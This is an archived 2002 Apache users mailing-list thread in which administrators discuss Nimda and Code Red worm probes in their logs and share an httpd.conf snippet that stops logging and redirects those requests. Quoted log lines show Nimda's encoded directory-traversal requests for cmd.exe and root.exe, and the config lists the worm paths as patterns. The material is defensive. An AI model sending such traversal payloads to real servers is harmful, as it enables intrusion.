You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@httpd.apache.org by Eduardo Gomez <in...@yahoo.com> on 2002/02/28 23:39:13 UTC
Code Red 2 attack
Hello:
Im using apache on Windows 2000.
In my apache error log I've found several entries which
(as far as I know) belong to Nimda and Red Code 2.
However, there's one that begins with about 15k of binary code
and ends with:
[Mon Feb 11 20:30:11 2002] [error] [client 61.152.254.1] Client sent
malformed Host header
Does this mean someone may have successfully hacked me through this
malformed header attack?
Is it normal to find so much binary code in the error log?
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Eduardo Gomez <in...@yahoo.com>.
----- Original Message -----
From: "Alex "Sniper" Togstad"
> I have kinda the same questions...
> Here is a snippet from my log:
> 12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
[snipped]
> Thats just Nimda attempts correct?
Yes, as far as I know....but those are supposed to be harmless
to Apache.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by "Alex \"Sniper\" Togstad" <sn...@3dretreat.com>.
I have kinda the same questions...
Here is a snippet from my log:
12.224.157.6 - - [05/Feb/2002:02:59:08 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:10 -0800] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:13 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:16 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
12.224.157.6 - - [05/Feb/2002:02:59:18 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:21 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
12.224.157.6 - - [05/Feb/2002:02:59:23 -0800] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
12.224.157.6 - - [05/Feb/2002:02:59:26 -0800] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
Thats just Nimda attempts correct?
Apache 1.3.23 on Win2k
Thanx!
----- Original Message -----
From: "Eduardo Gomez" <in...@yahoo.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 2:39 PM
Subject: Code Red 2 attack
> Hello:
>
> Im using apache on Windows 2000.
>
> In my apache error log I've found several entries which
> (as far as I know) belong to Nimda and Red Code 2.
> However, there's one that begins with about 15k of binary code
> and ends with:
>
> [Mon Feb 11 20:30:11 2002] [error] [client 61.152.254.1] Client sent
> malformed Host header
>
> Does this mean someone may have successfully hacked me through this
> malformed header attack?
> Is it normal to find so much binary code in the error log?
>
>
>
>
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Webmaster <we...@rolysvirtualpets.com>.
It only does any harm if you use IIS.
Eduardo Gomez wrote:
>
> Hello:
>
> Im using apache on Windows 2000.
>
> In my apache error log I've found several entries which
> (as far as I know) belong to Nimda and Red Code 2.
> However, there's one that begins with about 15k of binary code
> and ends with:
>
> [Mon Feb 11 20:30:11 2002] [error] [client 61.152.254.1] Client sent
> malformed Host header
>
> Does this mean someone may have successfully hacked me through this
> malformed header attack?
> Is it normal to find so much binary code in the error log?
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Lewis Watson <li...@visionsix.com>.
Yup. It is really agravating that they just sit there with infected, waste
of bandwidth munching systems and don't have the first clue that they are
even infected. It seems they would notice what their systems are doing....
but then again.....
Lewis Watson
----- Original Message -----
From: "Frank Reichenbacher" <fr...@mollynet.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 5:06 PM
Subject: Re: Code Red 2 attack
> Where have you been?
>
> My logs are full of probes from both the Nimda and Code Red worms and have
> been ever since they hit the streets last fall. I get hit every few
seconds
> by infected computers on my ISP's network. These servers have been
infected
> for many months and their admins are doing nothing about it.
>
> Frank
>
> ----- Original Message -----
> From: "Bill -OSX- Jones" <sn...@mac.com>
> To: <us...@httpd.apache.org>
> Sent: Thursday, February 28, 2002 4:06 PM
> Subject: Re: Code Red 2 attack
>
>
> > um, no ... Are you on Windows?
> >
> > On Thursday, February 28, 2002, at 05:39 PM, Eduardo Gomez wrote:
> > >
> > > Does this mean someone may have successfully hacked me through this
> > > malformed header attack?
> > > Is it normal to find so much binary code in the error log?
> > >
> >
> > ???
> > _Sx____________________
> > ('> -Sx- IUDICIUM
> > //\ Have Computer -
> > v_/_ Will Hack...
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by "Alex Blundell (aj)" <al...@btinternet.com>.
Follow up the ip that it came from is something to do with my isp?!?!?!
----- Original Message -----
From: "Alex Blundell (aj)" <al...@btinternet.com>
To: <us...@httpd.apache.org>
Sent: Friday, March 01, 2002 8:40 AM
Subject: Re: Code Red 2 attack
> I have a;so had the same problem, On my first box it started in January
and
> apeares every 10 minutes in my logs. AND on my new box that has only been
up
> a few weeks its in my logs about 4 times?
>
> [Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> exist: /var/www/html/MSADC/root.exe
> [Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> exist: /var/www/html/c/winnt/system32/cmd.exe
>
> Can anyone explain this???
> AJ
>
> ----- Original Message -----
> From: "Bill -OSX- Jones" <sn...@mac.com>
> To: <us...@httpd.apache.org>
> Sent: Thursday, February 28, 2002 11:32 PM
> Subject: Re: Code Red 2 attack
>
>
> > busy - but I do know about the problem - anyhow, I apologize, I
> > didn't intend to imply this isn't a problem for some Apache admins.
> >
> > On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
> >
> > > Where have you been?
> > >
> > > My logs are full of probes from both the Nimda and Code Red worms
> > > and have
> > > been ever since they hit the streets last fall. I get hit every
> > > few seconds
> > > by infected computers on my ISP's network. These servers have been
> > > infected
> > > for many months and their admins are doing nothing about it.
> > >
> >
> >
> > But as I don't do Windows, I guess I never really cared. So, to me,
> > it is really an issue of how fast can I ignore those requests...
> > _Sx____________________
> > ('> -Sx- IUDICIUM
> > //\ Have Computer -
> > v_/_ Will Hack...
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server
Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Mark Constable <ma...@renta.net>.
On Fri, 1 Mar 2002 19:33, Alex \"Sniper\" Togstad wrote:
> Is there a specific place to put this in the conf file? Everytime I put it
> in the httpd.conf file, and restart apache it failed to restart. I delete
> the code, save and restart and it works again....
Yes, after any LoadModules section, and make sure these two are
uncommented... (these file paths are specific to a Debian system)
LoadModule env_module /usr/lib/apache/1.3/mod_env.so
LoadModule rewrite_module /usr/lib/apache/1.3/mod_rewrite.so
If you copied this snippet verbatim then the path to the logfile is probably
incorrect... in any case, watching your error.log while starting apache and
that will most likely tell you what is wrong.
> > CustomLog /www/logs/access_log combined env=!nolog
cd /path/to/httpd.conf
grep -i errorlog httpd.conf
tail -f /path/to/error.log
--markc
> ----- Original Message -----
> From: "Erwien Samantha Y" <er...@netscape.net>
> To: <us...@httpd.apache.org>
> Sent: Friday, March 01, 2002 1:24 AM
> Subject: Re: Code Red 2 attack
>
> > add this in httpd.conf
> >
> > ##############################################
> > ##### Remove IIS worm From LOG ###############
> > #############################################
> > SetEnvIfNoCase Request_URI "^/scripts/" nolog
> > SetEnvIfNoCase Request_URI "^/msadc/" nolog
> > SetEnvIfNoCase Request_URI "^/MSADC/" nolog
> > SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
> > SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
> > SetEnvIfNoCase Request_URI "^/default.ida" nolog
> > Redirect gone /scripts/
> > Redirect gone /msadc/
> > Redirect gone /MSADC/
> > Redirect gone /_vti_bin/
> > Redirect gone /_mem_bin/
> > Redirect gone /c/winnt/
> > Redirect gone /d/winnt/
> > Redirect gone /default.ida
> >
> > CustomLog /www/logs/access_log combined env=!nolog
> >
> > regards,
> >
> > wIEn.
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Erwien Samantha Y <er...@netscape.net>.
It will be useless if you have TransferLog active.
sniper@3dretreat.com wrote:
>Is there a specific place to put this in the conf file? Everytime I put it
>in the httpd.conf file, and restart apache it failed to restart. I delete
>the code, save and restart and it works again....
>
>thanx!
>
>----- Original Message -----
>From: "Erwien Samantha Y" <er...@netscape.net>
>To: <us...@httpd.apache.org>
>Sent: Friday, March 01, 2002 1:24 AM
>Subject: Re: Code Red 2 attack
>
>
>>add this in httpd.conf
>>
>>##############################################
>>##### Remove IIS worm From LOG ###############
>>#############################################
>>SetEnvIfNoCase Request_URI "^/scripts/" nolog
>>SetEnvIfNoCase Request_URI "^/msadc/" nolog
>>SetEnvIfNoCase Request_URI "^/MSADC/" nolog
>>SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
>>SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
>>SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
>>SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
>>SetEnvIfNoCase Request_URI "^/default.ida" nolog
>>Redirect gone /scripts/
>>Redirect gone /msadc/
>>Redirect gone /MSADC/
>>Redirect gone /_vti_bin/
>>Redirect gone /_mem_bin/
>>Redirect gone /c/winnt/
>>Redirect gone /d/winnt/
>>Redirect gone /default.ida
>>
>>CustomLog /www/logs/access_log combined env=!nolog
>>
>>regards,
>>
>>wIEn.
>>
>>
>>alexblundell@btinternet.com wrote:
>>
>>>I have a;so had the same problem, On my first box it started in January
>>>
>and
>
>>>apeares every 10 minutes in my logs. AND on my new box that has only been
>>>
>up
>
>>>a few weeks its in my logs about 4 times?
>>>
>>>[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
>>>exist: /var/www/html/MSADC/root.exe
>>>[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
>>>exist: /var/www/html/c/winnt/system32/cmd.exe
>>>
>>>Can anyone explain this???
>>>AJ
>>>
>>>----- Original Message -----
>>>From: "Bill -OSX- Jones" <sn...@mac.com>
>>>To: <us...@httpd.apache.org>
>>>Sent: Thursday, February 28, 2002 11:32 PM
>>>Subject: Re: Code Red 2 attack
>>>
>>>
>>>>busy - but I do know about the problem - anyhow, I apologize, I
>>>>didn't intend to imply this isn't a problem for some Apache admins.
>>>>
>>>>On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
>>>>
>>>>>Where have you been?
>>>>>
>>>>>My logs are full of probes from both the Nimda and Code Red worms
>>>>>and have
>>>>>been ever since they hit the streets last fall. I get hit every
>>>>>few seconds
>>>>>by infected computers on my ISP's network. These servers have been
>>>>>infected
>>>>>for many months and their admins are doing nothing about it.
>>>>>
>>>>But as I don't do Windows, I guess I never really cared. So, to me,
>>>>it is really an issue of how fast can I ignore those requests...
>>>>_Sx____________________
>>>> ('> -Sx- IUDICIUM
>>>> //\ Have Computer -
>>>> v_/_ Will Hack...
>>>>
>>>>
>>>>---------------------------------------------------------------------
>>>>The official User-To-User support forum of the Apache HTTP Server
>>>>
>Project.
>
>>>>See <URL:http://httpd.apache.org/userslist.html> for more info.
>>>>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>>>For additional commands, e-mail: users-help@httpd.apache.org
>>>>
>>>
>>>---------------------------------------------------------------------
>>>The official User-To-User support forum of the Apache HTTP Server
>>>
>Project.
>
>>>See <URL:http://httpd.apache.org/userslist.html> for more info.
>>>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>>For additional commands, e-mail: users-help@httpd.apache.org
>>>
>>--
>>-== HonesT Is The BesT PoLicY ==-
>> -----------------
>>
>>
>>
>>
>>---------------------------------------------------------------------
>>The official User-To-User support forum of the Apache HTTP Server Project.
>>See <URL:http://httpd.apache.org/userslist.html> for more info.
>>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>
>
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
>
--
-== HonesT Is The BesT PoLicY ==-
-----------------
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by ar...@cosmic.net.au.
Also,
I think you may have to have those modules loaded first with LoadModule
before you try to use the functions/directives that it contains.
Just a thought if your using DSO modules.
Im sure someone with correct me if im wrong:)
On Fri, 1 Mar 2002, Hasanuddin Tamir wrote:
> You can basically put it anywhere in the conf file.
>
> SetEnvIfNoCase is handled by mod_setenvif, Redirect is handled by
> mod_alias, and CustomLog is handled by mod_log_config. Check those
> modules in one or both of these places,
>
> a. /usr/local/apache/bin/httpd -l
> mod_setenvif.c
> mod_alias.c
> mod_log_config.c
>
> b. ls /usr/local/apache/libexec
> mod_setenvif.so
> mod_alias.so
> mod_log_config.so
>
> Adjust the actual path according your local setting.
>
> --
> san->http(www.trabas.com)
> {If Linux doesn't have solution, you have the wrong problem}
>
> On Fri, 1 Mar 2002, Alex "Sniper" Togstad <sn...@3dretreat.com> wrote,
>
> > Is there a specific place to put this in the conf file? Everytime I put it
> > in the httpd.conf file, and restart apache it failed to restart. I delete
> > the code, save and restart and it works again....
> >
> > thanx!
> >
> > ----- Original Message -----
> > From: "Erwien Samantha Y" <er...@netscape.net>
> > To: <us...@httpd.apache.org>
> > Sent: Friday, March 01, 2002 1:24 AM
> > Subject: Re: Code Red 2 attack
> >
> >
> > > add this in httpd.conf
> > >
> > > ##############################################
> > > ##### Remove IIS worm From LOG ###############
> > > #############################################
> > > SetEnvIfNoCase Request_URI "^/scripts/" nolog
> > > SetEnvIfNoCase Request_URI "^/msadc/" nolog
> > > SetEnvIfNoCase Request_URI "^/MSADC/" nolog
> > > SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> > > SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> > > SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
> > > SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
> > > SetEnvIfNoCase Request_URI "^/default.ida" nolog
> > > Redirect gone /scripts/
> > > Redirect gone /msadc/
> > > Redirect gone /MSADC/
> > > Redirect gone /_vti_bin/
> > > Redirect gone /_mem_bin/
> > > Redirect gone /c/winnt/
> > > Redirect gone /d/winnt/
> > > Redirect gone /default.ida
> > >
> > > CustomLog /www/logs/access_log combined env=!nolog
> > >
> > > regards,
> > >
> > > wIEn.
> > >
> > >
> > > alexblundell@btinternet.com wrote:
> > >
> > > >I have a;so had the same problem, On my first box it started in January
> > and
> > > >apeares every 10 minutes in my logs. AND on my new box that has only been
> > up
> > > >a few weeks its in my logs about 4 times?
> > > >
> > > >[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> > > >exist: /var/www/html/MSADC/root.exe
> > > >[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> > > >exist: /var/www/html/c/winnt/system32/cmd.exe
> > > >
> > > >Can anyone explain this???
> > > >AJ
> > > >
> > > >----- Original Message -----
> > > >From: "Bill -OSX- Jones" <sn...@mac.com>
> > > >To: <us...@httpd.apache.org>
> > > >Sent: Thursday, February 28, 2002 11:32 PM
> > > >Subject: Re: Code Red 2 attack
> > > >
> > > >
> > > >>busy - but I do know about the problem - anyhow, I apologize, I
> > > >>didn't intend to imply this isn't a problem for some Apache admins.
> > > >>
> > > >>On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
> > > >>
> > > >>>Where have you been?
> > > >>>
> > > >>>My logs are full of probes from both the Nimda and Code Red worms
> > > >>>and have
> > > >>>been ever since they hit the streets last fall. I get hit every
> > > >>>few seconds
> > > >>>by infected computers on my ISP's network. These servers have been
> > > >>>infected
> > > >>>for many months and their admins are doing nothing about it.
> > > >>>
> > > >>
> > > >>But as I don't do Windows, I guess I never really cared. So, to me,
> > > >>it is really an issue of how fast can I ignore those requests...
> > > >>_Sx____________________
> > > >> ('> -Sx- IUDICIUM
> > > >> //\ Have Computer -
> > > >> v_/_ Will Hack...
> > > >>
> > > >>
> > > >>---------------------------------------------------------------------
> > > >>The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > > >>See <URL:http://httpd.apache.org/userslist.html> for more info.
> > > >>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > >>For additional commands, e-mail: users-help@httpd.apache.org
> > > >>
> > > >
> > > >
> > > >---------------------------------------------------------------------
> > > >The official User-To-User support forum of the Apache HTTP Server
> > Project.
> > > >See <URL:http://httpd.apache.org/userslist.html> for more info.
> > > >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > >For additional commands, e-mail: users-help@httpd.apache.org
> > > >
> > >
> > > --
> > > -== HonesT Is The BesT PoLicY ==-
> > > -----------------
> > >
> > >
> > >
> > >
> > > ---------------------------------------------------------------------
> > > The official User-To-User support forum of the Apache HTTP Server Project.
> > > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > For additional commands, e-mail: users-help@httpd.apache.org
> > >
> > >
> >
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Hasanuddin Tamir <sa...@trabas.com>.
You can basically put it anywhere in the conf file.
SetEnvIfNoCase is handled by mod_setenvif, Redirect is handled by
mod_alias, and CustomLog is handled by mod_log_config. Check those
modules in one or both of these places,
a. /usr/local/apache/bin/httpd -l
mod_setenvif.c
mod_alias.c
mod_log_config.c
b. ls /usr/local/apache/libexec
mod_setenvif.so
mod_alias.so
mod_log_config.so
Adjust the actual path according your local setting.
--
san->http(www.trabas.com)
{If Linux doesn't have solution, you have the wrong problem}
On Fri, 1 Mar 2002, Alex "Sniper" Togstad <sn...@3dretreat.com> wrote,
> Is there a specific place to put this in the conf file? Everytime I put it
> in the httpd.conf file, and restart apache it failed to restart. I delete
> the code, save and restart and it works again....
>
> thanx!
>
> ----- Original Message -----
> From: "Erwien Samantha Y" <er...@netscape.net>
> To: <us...@httpd.apache.org>
> Sent: Friday, March 01, 2002 1:24 AM
> Subject: Re: Code Red 2 attack
>
>
> > add this in httpd.conf
> >
> > ##############################################
> > ##### Remove IIS worm From LOG ###############
> > #############################################
> > SetEnvIfNoCase Request_URI "^/scripts/" nolog
> > SetEnvIfNoCase Request_URI "^/msadc/" nolog
> > SetEnvIfNoCase Request_URI "^/MSADC/" nolog
> > SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> > SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
> > SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
> > SetEnvIfNoCase Request_URI "^/default.ida" nolog
> > Redirect gone /scripts/
> > Redirect gone /msadc/
> > Redirect gone /MSADC/
> > Redirect gone /_vti_bin/
> > Redirect gone /_mem_bin/
> > Redirect gone /c/winnt/
> > Redirect gone /d/winnt/
> > Redirect gone /default.ida
> >
> > CustomLog /www/logs/access_log combined env=!nolog
> >
> > regards,
> >
> > wIEn.
> >
> >
> > alexblundell@btinternet.com wrote:
> >
> > >I have a;so had the same problem, On my first box it started in January
> and
> > >apeares every 10 minutes in my logs. AND on my new box that has only been
> up
> > >a few weeks its in my logs about 4 times?
> > >
> > >[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> > >exist: /var/www/html/MSADC/root.exe
> > >[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> > >exist: /var/www/html/c/winnt/system32/cmd.exe
> > >
> > >Can anyone explain this???
> > >AJ
> > >
> > >----- Original Message -----
> > >From: "Bill -OSX- Jones" <sn...@mac.com>
> > >To: <us...@httpd.apache.org>
> > >Sent: Thursday, February 28, 2002 11:32 PM
> > >Subject: Re: Code Red 2 attack
> > >
> > >
> > >>busy - but I do know about the problem - anyhow, I apologize, I
> > >>didn't intend to imply this isn't a problem for some Apache admins.
> > >>
> > >>On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
> > >>
> > >>>Where have you been?
> > >>>
> > >>>My logs are full of probes from both the Nimda and Code Red worms
> > >>>and have
> > >>>been ever since they hit the streets last fall. I get hit every
> > >>>few seconds
> > >>>by infected computers on my ISP's network. These servers have been
> > >>>infected
> > >>>for many months and their admins are doing nothing about it.
> > >>>
> > >>
> > >>But as I don't do Windows, I guess I never really cared. So, to me,
> > >>it is really an issue of how fast can I ignore those requests...
> > >>_Sx____________________
> > >> ('> -Sx- IUDICIUM
> > >> //\ Have Computer -
> > >> v_/_ Will Hack...
> > >>
> > >>
> > >>---------------------------------------------------------------------
> > >>The official User-To-User support forum of the Apache HTTP Server
> Project.
> > >>See <URL:http://httpd.apache.org/userslist.html> for more info.
> > >>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > >>For additional commands, e-mail: users-help@httpd.apache.org
> > >>
> > >
> > >
> > >---------------------------------------------------------------------
> > >The official User-To-User support forum of the Apache HTTP Server
> Project.
> > >See <URL:http://httpd.apache.org/userslist.html> for more info.
> > >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > >For additional commands, e-mail: users-help@httpd.apache.org
> > >
> >
> > --
> > -== HonesT Is The BesT PoLicY ==-
> > -----------------
> >
> >
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
> >
> >
>
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by "Alex \"Sniper\" Togstad" <sn...@3dretreat.com>.
Is there a specific place to put this in the conf file? Everytime I put it
in the httpd.conf file, and restart apache it failed to restart. I delete
the code, save and restart and it works again....
thanx!
----- Original Message -----
From: "Erwien Samantha Y" <er...@netscape.net>
To: <us...@httpd.apache.org>
Sent: Friday, March 01, 2002 1:24 AM
Subject: Re: Code Red 2 attack
> add this in httpd.conf
>
> ##############################################
> ##### Remove IIS worm From LOG ###############
> #############################################
> SetEnvIfNoCase Request_URI "^/scripts/" nolog
> SetEnvIfNoCase Request_URI "^/msadc/" nolog
> SetEnvIfNoCase Request_URI "^/MSADC/" nolog
> SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
> SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
> SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
> SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
> SetEnvIfNoCase Request_URI "^/default.ida" nolog
> Redirect gone /scripts/
> Redirect gone /msadc/
> Redirect gone /MSADC/
> Redirect gone /_vti_bin/
> Redirect gone /_mem_bin/
> Redirect gone /c/winnt/
> Redirect gone /d/winnt/
> Redirect gone /default.ida
>
> CustomLog /www/logs/access_log combined env=!nolog
>
> regards,
>
> wIEn.
>
>
> alexblundell@btinternet.com wrote:
>
> >I have a;so had the same problem, On my first box it started in January
and
> >apeares every 10 minutes in my logs. AND on my new box that has only been
up
> >a few weeks its in my logs about 4 times?
> >
> >[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
> >exist: /var/www/html/MSADC/root.exe
> >[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
> >exist: /var/www/html/c/winnt/system32/cmd.exe
> >
> >Can anyone explain this???
> >AJ
> >
> >----- Original Message -----
> >From: "Bill -OSX- Jones" <sn...@mac.com>
> >To: <us...@httpd.apache.org>
> >Sent: Thursday, February 28, 2002 11:32 PM
> >Subject: Re: Code Red 2 attack
> >
> >
> >>busy - but I do know about the problem - anyhow, I apologize, I
> >>didn't intend to imply this isn't a problem for some Apache admins.
> >>
> >>On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
> >>
> >>>Where have you been?
> >>>
> >>>My logs are full of probes from both the Nimda and Code Red worms
> >>>and have
> >>>been ever since they hit the streets last fall. I get hit every
> >>>few seconds
> >>>by infected computers on my ISP's network. These servers have been
> >>>infected
> >>>for many months and their admins are doing nothing about it.
> >>>
> >>
> >>But as I don't do Windows, I guess I never really cared. So, to me,
> >>it is really an issue of how fast can I ignore those requests...
> >>_Sx____________________
> >> ('> -Sx- IUDICIUM
> >> //\ Have Computer -
> >> v_/_ Will Hack...
> >>
> >>
> >>---------------------------------------------------------------------
> >>The official User-To-User support forum of the Apache HTTP Server
Project.
> >>See <URL:http://httpd.apache.org/userslist.html> for more info.
> >>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> >>For additional commands, e-mail: users-help@httpd.apache.org
> >>
> >
> >
> >---------------------------------------------------------------------
> >The official User-To-User support forum of the Apache HTTP Server
Project.
> >See <URL:http://httpd.apache.org/userslist.html> for more info.
